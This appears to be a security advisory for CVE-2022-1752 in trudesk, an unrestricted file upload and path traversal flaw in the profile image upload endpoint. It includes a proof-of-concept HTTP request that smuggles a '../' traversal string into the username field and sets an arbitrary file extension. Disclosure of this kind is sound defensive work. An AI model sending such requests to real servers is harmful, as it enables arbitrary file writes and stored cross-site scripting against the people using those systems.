Headline
CVE-2022-1752: Unrestricted File Upload and Path Traversal in upload image in trudesk
Unrestricted Upload of File with Dangerous Type in GitHub repository polonel/trudesk prior to 1.2.2.
Description
The uploadImage function in accountsController take file path and extension from users . An attacker can change the path and extension to upload dangerous file to anywhere in server.
Proof of Concept
1. Login
2. Upload profile image
3. Capture request, modify `username` and `filename`
POST /accounts/uploadImage HTTP/1.1
Host: 192.168.20.132:8118
Content-Length: 452
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQXoDBooqQ26crHR0
Origin: http://192.168.20.132:8118
Referer: http://192.168.20.132:8118/accounts
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: connect.sid=s%3A01nLIvLiz-oEhbSpekE9nwUSl9R_PQF1.GeCCIcToZnO%2BDlTis77aXBlVGyVOaQDURoUrIcrXQ%2BM; $trudesk%3Atimezone=America/New_York
Connection: close
------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="username"
/../../../../../../testpathtravesal1
------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="_id"
627ce4cd7778b2c5b5f49851
------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="image"; filename="filename.anything"
Content-Type: image/jpeg
<image content>
------WebKitFormBoundaryQXoDBooqQ26crHR0--
Impact
Authenticated user can upload dangerous file to anywhere in server (example: upload a file with .html extension lead to stored xss)
Occurrences
accounts.js L485-L505
This function take object.username into join.path() lead to path traversal, take path.extname(filename) lead to upload file with dangerous type